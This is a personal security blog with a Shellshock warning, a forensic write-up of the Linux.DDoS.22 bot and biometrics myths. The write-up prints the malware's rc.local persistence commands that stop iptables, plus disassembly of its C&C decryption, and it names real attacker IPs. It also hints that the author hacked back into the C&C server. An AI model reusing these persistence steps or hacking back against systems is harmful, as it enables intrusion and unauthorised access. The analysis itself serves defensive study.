what i do?

Am an Information Risk Consultant and Penetration Tester, i specialize mostly in penetrating secure networks/computer systems where i simulate an organized professional attack against your organization, where after that a detailed report with weakness and exploited vectors are summarized. This will help you gain control over your infrastructures security and maximize your protection.

Saturday, November 22, 2014

NEW WAVE OF ATTACKS, (this post is dedicated to Sys Admins)

I work a lot with huge Banks, several Government agencies, Parastatals, Huge PR firms that are always targets, by Major Blackhat organizations. Mark my words, i have seen all kinds of attacks, and dirt these hackers leave behind.



Since shellshock vulnerability went public i have seen some major bash attacks out of nowhere with hackers launching serious operations in major infrastructures across the globe. Chinese bot herders are also soooo busy getting ELF Binaries on servers especially the ones with Cpanels (commonly used by all Webmasters in Nairobi) due to CGIs that the webmasters left hanging behind. Funny thing is that Sys Admins don't listen, now a lot of them have learned these lessons the hard way.

Now apart from the Chinese Bot herders, Hacktivists and Organized Criminals, there is a wave of operatives literally targeting infrastructure that might have Sensitive Codes, Sensitive Documents, Website Backups + Their Web Databases, Email Addresses and then uploading to compromised servers or even 0wn3d CNCs and after using Shellshock vulnerabilities (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187)

The way these attacks are running, it seems like some spy organizations, well funded, well organized, has a lot of time in their hands are ready to collect intelligence from unsuspecting infrastructures.

Its real important that Admins get to patch up their machines, in time. Such a huge flaw that affects every application that executes bash from Postfix to Apache to Nginx is Critical and can cause huge Business Impact.

Sunday, October 26, 2014

CHINA ELFs

Its been a while since i posted, been crazy busy, but this coming month, i will set up some time, for just blogging.

A few months ago, we were testing an KE Govt office, that was complaining of high attacks which they didn't understand and they couldn't find it, since it was Linux based. And as you know GOK has less capacity as far as Cyber Crime and Cyber Warfare is concerned. So during our tests, we landed on Linux.DDoS.22.

During Penetration Tests, we get to find a lot, and i can assure you, not only CyberWarfare in EAfrica, there alot of Cyber Espionage attacks and Cyber Terror happening right now.

Linux.DDoS.22 is Chinese ELF, that is used for DDOS attacks on unaware infrastuctures around the world. The attackers install the ELF as pktmake which you will find in /bin in your Linux servers and it modifies your /etc/rc.local for automatic restarts like below:

cat /etc/rc.local
#!/bin/sh -e
/root/task1 reboot
/root/server reboot
/root/guchun26 reboot


It will even stop the iptables as follows on rc.local:

cd  /root/
./10&
/etc/init.d/iptables stop
cd  /root/
./10&
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./10
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./10
/etc/init.d/iptables stop
cd  /root/
./ma&
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
/bin/cmds start



During our reverse engineering and forensics outputs we realized the elf was collecting information about the infected box, hardware, processor information, amount of memory, and is sent to some Chinese crooks via encrypted communication to a C&C.

The C&C is usually hard-coded on the source code, but the Chinese use mathematics formulas to hide the information and its up to the forensics engineers to find that information via Reversing Engineering, Counter Cyber Intelligence and Covert Data Acquisitions.

One of the IPs can be found with common checks by use of lsof as below

pktmake    1355    root    3u  IPv4   9964      0t0  TCP REDACTED.xx.ke:36811->23.234.50.32:37368 (ESTABLISHED)

With reverse engineering we were able to find other IPs from china that were used to upload logs and update the box, but the above machine if hacked, could find more intel about the main C&C and thats what we were after.

An nmap scan on the box showed us this:

Nmap scan report for 23.234.50.32
Host is up (0.32s latency).
Not shown: 65305 closed ports, 44 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http-proxy    Squid http proxy 2.7.STABLE4
89/tcp    open  http          Microsoft IIS httpd
1025/tcp  open  msrpc         Microsoft Windows RPC
3306/tcp  open  mysql         MySQL (unauthorized)
5918/tcp  open  ms-wbt-server Microsoft Terminal Service
37368/tcp open  unknown


So, i am not going to go deep into how this Chinese Box was exploited, but after a couple of Reverse engineering the ELFs:

/bin/pktmake: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

We found other ELFs that had great associations with the major ELF.

file /bin/cmds
/bin/cmds: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.18, not stripped

file /root/guchun26
/root/guchun26: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped



And these were the files used to compile:


crtstuff.c
main.cpp
DNS.cpp
AttackLogic.cpp
Iattack.cpp
info.cpp
Lock.cpp
SYN.cpp
TaskManager.cpp
TCP.cpp
TcpClient.cpp
Thread.cpp
UDP.cpp
utils.cpp
CC.cpp
rc4.c

The first initial part was to find pieces of code on how the elf was connecting to the C&C and how we would find all the other Boxes they were using for initial attacks.

_v2072 = ">>>>>>>>>>> in net wrok thread";
     *__esp = 135652608;
    _t31 = __ebx->basic_ostream& , 5, char * )(__edi, __esi);
    _v2072 = 134746416;
     *__esp = _t31;
    L0807EF10();
    L080DEAD0(__ebx, __edi, __esi,  &_v2052, 0, 2048);
    while(( *(_a4 + 100) & 255 ^ 1) != 0) {
        _t39 = _a4 + 560->c_str(void )();
        _v2068 = 37368;
        _v2072 = _t39;
         *__esp = _a4 + 60;
        if((_t39->Connect(char * , unsigned int )() ^ 1) == 0) {
            if((L08049C60(_a4, _a4) ^ 1) == 0) {
                while(( *(_a4 + 100) & 255 ^ 1) != 0) {
                    L080DEAD0(__ebx, __edi, __esi,  &_v2052, 0, 2048);
                    if((L0805223E( ?_? ( &_v2052), _a4 + 60,  &_v2052) ^ 1) != 0) {


Thats when we started to understand the mathematics formula used by the intruder.
Alright, some Segment mapping:

  Segment Sections...
   00     .note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
   01     .tdata .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
   02     .note.ABI-tag
   03     .tdata .tbss

A lot of Chinese Lang on the source code

.rodata:081301A0 aINZD  db 'エエスィヤュハシフラスモラヨハァーワ(%d)',0Dh,0Ah,0
0x00747E0  CUNG5
0x007518F  CUNG
0x0075693  B4CUNG
0x0102520  i18n:1999
 
 
A file called fake.cfg had some juicy information,


0
YOUR-IP-HERE:AND-HERE
10000:60000
 
 
getsockname(3, {sa_family=AF_INET, sin_port=htons(48417), sin_addr=inet_addr("mmd.mmd.mmd.mmd")}, [16]) = 0

Also they were doing test connections by use of www.baidu.com, to see if its reachable once the ELF is installed.

0x00E50FD  www.baidu.com
// PoC:
sendto(3, "\231\v\1\0\0\1\0\0\0\0\0\0\3www\5baidu\3com\0\0\1\0\1", 31, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 31
recvfrom(3, "\231\v\201\200\0\1\0\2\0\0\0\0\3www\5baidu\3com\0\0\1\0\1\300"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 74


DDOS functionality was actually on a file called ThreadAttack.cpp, this was interesting, cause this is where we realized we might catch the main Chinese C&C server.
0x805478A ; CThreadAttack::EmptyConnectionAtk(CSubTask &)
  0x805478Apublic _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask
  0x805478A_ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask proc near
  0x805478A push ebp
  0x805478B mov  ebp, esp
  0x805478D leave
  0x805478E retn
  0x805478E
  0x805478E _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask endp
 
  0x8054790 ; CThreadAttack::HttpAtk(CSubTask &)
  0x8054790public _ZN13CThreadAttack7HttpAtkER8CSubTask
  0x8054790_ZN13CThreadAttack7HttpAtkER8CSubTask proc near
  0x8054790 push ebp
  0x8054791 mov  ebp, esp
  0x8054793 leave
  0x8054794 retn
  0x8054794
  0x8054794 _ZN13CThreadAttack7HttpAtkER8CSubTask endp
 
  0x8054796 ; CThreadAttack::FakeUserAtk(CSubTask &)
  0x8054796public _ZN13CThreadAttack11FakeUserAtkER8CSubTask
  0x8054796_ZN13CThreadAttack11FakeUserAtkER8CSubTask proc near
  0x8054796 push ebp
  0x8054797 mov  ebp, esp
  0x8054799 leave
  0x805479A retn
  0x805479A
  0x805479A _ZN13CThreadAttack11FakeUserAtkER8CSubTask endp
  0x80532D2 sub  esp, 214h ; Integer Subtraction
  0x80532D8 lea  ecx, [ebp+var_10C] ; Load Effective Address
  0x80532DE mov  edx, offset _ZZN9CServerIP10InitializeEvE4C_48 ; CServerIP::Initialize(void)::C.48 <======
  0x80532E3 mov  eax, 100h
  0x80532E8 sub  esp, 4  ; Integer Subtraction
  0x80532EB push eax
  0x80532EC push edx
  0x80532ED push ecx
  0x80532EE call memcpy  ; Call Procedure
  0x80532F3 add  esp, 10h; Add
  0x80532F6 lea  ecx, [ebp+var_20C] ; Load Effective Address
  0x80532FC mov  edx, offset _ZZN9CServerIP10InitializeEvE4C_49 ; CServerIP::Initialize(void)::C.49 <======
  0x8053301 mov  eax, 100h
  0x8053306 sub  esp, 4  ; Integer Subtraction
  0x8053309 push eax
  0x805330A push edx
  0x805330B push ecx
  0x805330C call memcpy  ; Call Procedure
  0x8053311 add  esp, 10h; Add
  0x8053314 push 27h
  0x8053316 push offset a7005601212 ; "70/056/012/12"  ; <============================
  0x805331B push 0FFh
  0x8053320 lea  eax, [ebp+var_10C] ; Load Effective Address
  0x8053326 push eax
  0x8053327 call _ZN8CUtility7DeCryptEPciPKci ; CUtility::DeCrypt(char *,int,char  const*,int)
  0x805332C add  esp, 10h; Add
  0x805332F push 0Ah
  0x8053331 push offset a63551; "63551" ; <============================
  0x8053336 push 0FFh
  0x805333B lea  eax, [ebp+var_20C] ; Load Effective Address
  0x8053341 push eax
  0x8053342 call _ZN8CUtility7DeCryptEPciPKci ; CUtility::DeCrypt(char *,int,char  const

So far we had the formula, now it was all about getting down to crack the code on C&C information.
0x8062EF0
  0x8062EF0 ; CUtility::DeCrypt(char *, int, char  const*, int)
  0x8062EF0 public _ZN8CUtility7DeCryptEPciPKci
  0x8062EF0 _ZN8CUtility7DeCryptEPciPKci proc near  ; CODE XREF: CServerIP::Initialize(void)
  0x8062EF0 ; CServerIP::Initialize(void)
  0x8062EF0
  0x8062EF0 var_4= dword ptr -4
  0x8062EF0 arg_0= dword ptr  8
  0x8062EF0 arg_4= dword ptr  0Ch
  0x8062EF0 arg_8= dword ptr  10h
  0x8062EF0 arg_C= dword ptr  14h
  0x8062EF0
  0x8062EF0 push ebp
  0x8062EF1 mov  ebp, esp
  0x8062EF3 sub  esp, 10h; Integer Subtraction
  0x8062EF6 mov  [ebp+var_4], 0
  0x8062EFD jmp  short loc_8062F36 ; Jump
  0x8062EFD
  0x8062EFF
  0x8062EFF loc_8062EFF: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062EFF mov  eax, [ebp+var_4]
  0x8062F02 and  eax, 1  ; Logical AND
  0x8062F05 test al, al  ; Logical Compare
  0x8062F07 jzshort loc_8062F1E ; Jump if Zero (ZF=1)
  0x8062F07
  0x8062F09 mov  eax, [ebp+var_4]
  0x8062F0C mov  edx, eax
  0x8062F0E add  edx, [ebp+arg_0] ; Add
  0x8062F11 mov  eax, [ebp+var_4]
  0x8062F14 add  eax, [ebp+arg_8] ; Add
  0x8062F17 mov  al, [eax]
  0x8062F19 inc  eax  ; Increment by 1
  0x8062F1A mov  [edx], al
  0x8062F1C jmp  short loc_8062F31 ; Jump
  0x8062F1C
  0x8062F1E
  0x8062F1E loc_8062F1E: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F1E mov  eax, [ebp+var_4]
  0x8062F21 mov  edx, eax
  0x8062F23 add  edx, [ebp+arg_0] ; Add
  0x8062F26 mov  eax, [ebp+var_4]
  0x8062F29 add  eax, [ebp+arg_8] ; Add
  0x8062F2C mov  al, [eax]
  0x8062F2E dec  eax  ; Decrement by 1
  0x8062F2F mov  [edx], al
  0x8062F2F
  0x8062F31
  0x8062F31 loc_8062F31: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F31 lea  eax, [ebp+var_4] ; Load Effective Address
  0x8062F34 inc  dword ptr [eax] ; Increment by 1
  0x8062F34
  0x8062F36
  0x8062F36 loc_8062F36: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F36 mov  eax, [ebp+var_4]
  0x8062F39 cmp  eax, [ebp+arg_C] ; Compare Two Operands
  0x8062F3C jge  short locret_8062F52 ; Jump if Greater or Equal (SF=OF)
  0x8062F3C
  0x8062F3E mov  eax, [ebp+var_4]
  0x8062F41 cmp  eax, [ebp+arg_4] ; Compare Two Operands
  0x8062F44 jge  short locret_8062F52 ; Jump if Greater or Equal (SF=OF)
  0x8062F44
  0x8062F46 mov  eax, [ebp+var_4]
  0x8062F49 add  eax, [ebp+arg_8] ; Add
  0x8062F4C mov  al, [eax]
  0x8062F4E test al, al  ; Logical Compare
  0x8062F50 jnz  short loc_8062EFF ; Jump if Not Zero (ZF=0)
  0x8062F50
  0x8062F52
  0x8062F52 locret_8062F52: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F52 ; CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F52 leave; High Level Procedure Exit
  0x8062F53 retn ; Return Near from Procedure
  0x8062F53
  0x8062F53 _ZN8CUtility7DeCryptEPciPKci endp
  0x8062F53

And this decoded the main C&C as 61.147.103.21:54460

This CnC Server also hosted the binaries to update the small operational botnets on HFS app.











One of the machines we caught, that was used to manipulate the L.A. Chinese Bot Server, was 220.191.230.250
Now do some research on that, and tell me if you know who those are.


Wednesday, July 02, 2014

MYTHS ON BIOMETRICS

Myth: Iris recognition devices use lasers to scan your eyes,

Reality: Iris recognition cameras take a black and white picture and use non-invasive near-infrared illumination that is barely visible and very safe.

Myth: "Stolen" body parts can be used to fool the system.

Reality: Quality biometric recording and detection systems can determine "liveness" in order to prevent tis type of fraud.

Myth: Identical twins can fool the system.

Reality: If the system is poorly configured, then this is possible, though can be eradicated during during a White Box Penetration Testing. Good systems will highlight a false match, which will require human intervention to complete the identification process.

Myth: Biometrics will get rid of the evil in our world.

Reality: Identity Management systems cannot perform miracles.


Continue doing real Penetration Testing, and lets secure facilities for real.